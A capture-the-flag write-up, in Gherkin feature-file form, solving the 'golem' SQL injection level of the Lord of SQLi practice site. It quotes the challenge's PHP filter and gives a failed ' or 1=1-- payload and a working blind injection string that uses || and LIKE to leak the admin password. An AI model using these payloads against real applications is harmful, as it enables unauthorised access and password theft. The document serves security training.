## Version 2.0
## language: en

Feature: golem-sql-injection-lordofsqli
  Site:
    https://los.rubiya.kr/gate.php
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | NixOS           | 19.09.2260          |
  | Chromium        | 78.0.3904.87        |

  Machine information:
    Given the challenge URL
    """
    https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php
    """
    When I open the url with Chrome
    Then I see the PHP code that validates the password
    And It shows the query made on the screen
    """
    select id from prob_golem where id='guest' and pw=''
    """
  Scenario: Fail:Sql-injection
    Given the PHP code
    And knowing that answer is correct when It returns:
    """
      GOLEM Clear!
    """
    When I try with the well known payload:
    """
      pw=' or 1=1--
    """
    Then I get nothing
    But I don't solve it

   Scenario: Success:Sqli-boolean-exploitation
    Given that I inspected the code
    And I see that they validate "or/and/substr/=" clauses
    And also to pass the challenge I need the actual admin password
    """
    if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe");
    $_GET[pw] = addslashes($_GET[pw]);
    $query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'";
    if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem");
    """
    Then I used the following to bypass the protections
    And to iterate through characters to get the admin password
    """
    ?pw=1' || (id like 'admin' && pw like  'a%')--
    """
    Then I created a python script to find it using substr [exploit.py]
    And I get the admin password
    Then I solve the challenge
